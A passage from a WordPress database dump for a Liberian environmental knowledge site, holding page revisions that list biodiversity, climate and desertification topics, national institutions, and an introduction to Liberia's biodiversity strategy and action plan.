href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n												<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n															Learn More														\n											</a>\n																							<a href=\"https://ekmsliberia.info/author/admin_2/\" title=\"Visit Author Page\" rel=\"author\" >\n													<img alt=\'\' src=\'http://2.gravatar.com/avatar/b91a66d6dcfd6e1f406280637947d072?s=100&#038;d=mm&#038;r=g\' srcset=\'http://2.gravatar.com/avatar/b91a66d6dcfd6e1f406280637947d072?s=200&#038;d=mm&#038;r=g 2x\' class=\'avatar avatar-100 photo\' height=\'100\' width=\'100\' />												</a>\n										<!-- .oew-grid-media -->\n												<h2>\n													<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n												</h2>\n													Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;												\n										<!-- .oew-grid-details -->\n										<ul>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n																							<li><a href=\"https://ekmsliberia.info/category/news/\" rel=\"category tag\">News</a></li>\n										</ul>\n						</article>\n						<article id=\"post-331\">\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n												<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n															Learn More														\n											</a>\n																							<a href=\"https://ekmsliberia.info/author/admin_2/\" title=\"Visit Author Page\" rel=\"author\" >\n													<img alt=\'\' src=\'http://2.gravatar.com/avatar/b91a66d6dcfd6e1f406280637947d072?s=100&#038;d=mm&#038;r=g\' srcset=\'http://2.gravatar.com/avatar/b91a66d6dcfd6e1f406280637947d072?s=200&#038;d=mm&#038;r=g 2x\' class=\'avatar avatar-100 photo\' height=\'100\' width=\'100\' />												</a>\n										<!-- .oew-grid-media -->\n												<h2>\n													<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n												</h2>\n													Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;												\n										<!-- .oew-grid-details -->\n										<ul>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n																							<li><a href=\"https://ekmsliberia.info/category/news/\" rel=\"category tag\">News</a></li>\n										</ul>\n						</article>\n			<!-- .oew-blog-grid -->\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n			<h2>The United Nations Convention on Biological Diversity</h2>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 20:42:10','2019-11-09 20:42:10','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(564,1,'2019-11-09 20:58:58','2019-11-09 20:58:58','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 20:58:58','2019-11-09 20:58:58','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(566,1,'2019-11-09 21:10:12','2019-11-09 21:10:12','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 21:10:12','2019-11-09 21:10:12','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(567,1,'2019-11-09 21:12:06','2019-11-09 21:12:06','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 21:12:06','2019-11-09 21:12:06','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(568,1,'2019-11-09 21:12:32','2019-11-09 21:12:32','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 21:12:32','2019-11-09 21:12:32','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(569,1,'2019-11-09 21:15:27','2019-11-09 21:15:27','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 21:15:27','2019-11-09 21:15:27','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(570,1,'2019-11-10 02:04:51','2019-11-10 02:04:51','Liberia has been regarded as one of the Biodiversity hotspots in the world, and one which contains the highest remaining portion (42%) of the Upper Guinea Massif including plants with high endemism. The country boasts of over 2000 vascular plant species, 600 bird species, 75 reptile species, 150 mammal species, etc., which demand adequate safeguard/ measures. Thus to enhance the conservation and sustainable utilization of biological resources, Liberia needs a sound, comprehensive and holistic blueprint (strategy) which will chart the way to sustainable management/governance of these resources.\r\n\r\nLiberia ratified the Convention on Biological Diversity (CBD) on November 8, 2000, and in 2002 commenced the writing of a strategy &amp; action plan that underscores the importance the country attaches to its intrinsic values of biological resources. Since 2004 when the document was launched, it has served as a national blueprint utilized by sector institutions responsible for biodiversity management in the country.\r\n\r\nThe revised NBSAP has been prepared consistent with Strategic Goals of the CBD and its Aichi Targets, as well as Liberia‘s national goals and objectives for biodiversity management. The Strategy takes into account key issues identified by stakeholders critical for biodiversity conservation and provides strategic direction to enhance biodiversity management. I look forward to successful implementation of the Strategy, with support and collaboration of all stakeholders.','Liberia National Biodiversity Conservation Strategy and Action Plan','Liberia has been regarded as one of the Biodiversity hotspots in the world, and one which contains the highest remaining portion (42%) of the Upper Guinea Massif including plants with high endemism.','publish','closed','closed','','liberia-national-biodiversity-conservation-strategy-and-action-plan','','','2022-07-28 14:00:05','2022-07-28 14:00:05','',0,'https://ekmsliberia.info/?post_type=document&#038;p=570',184,'document','',0),(571,1,'2019-11-10 02:03:06','2019-11-10 02:03:06','','liberia-nbsap-v2-en','','inherit','open','closed','','liberia-nbsap-v2-en','','','2019-11-10 02:37:05','2019-11-10 02:37:05','',570,'https://ekmsliberia.info/wp-content/uploads/2019/11/liberia-nbsap-v2-en.pdf',0,'attachment','application/pdf',0),(576,1,'2019-11-10 02:46:20','2019-11-10 02:46:20','','Documents Cover Image','','publish','closed','closed','','document_cover_image','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',419,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=576',0,'_pods_field','',0),(578,1,'2019-11-10 02:54:16','2019-11-10 02:54:16','','Download Link','','publish','closed','closed','','download_link','','','2021-08-18 11:48:39','2021-08-18 11:48:39','',419,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=578',2,'_pods_field','',0),(702,1,'2019-11-10 13:21:56','2019-11-10 13:21:56','<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 13:21:56','2019-11-10 13:21:56','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(704,1,'2019-11-10 14:28:52','2019-11-10 14:28:52','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 14:28:52','2019-11-10 14:28:52','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(705,1,'2019-11-10 14:47:03','2019-11-10 14:47:03','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 14:47:03','2019-11-10 14:47:03','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(707,1,'2019-11-10 14:52:50','2019-11-10 14:52:50','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 14:52:50','2019-11-10 14:52:50','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(709,1,'2019-11-10 15:02:51','2019-11-10 15:02:51','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 15:02:51','2019-11-10 15:02:51','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(710,1,'2019-11-10 15:10:00','2019-11-10 15:10:00','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a 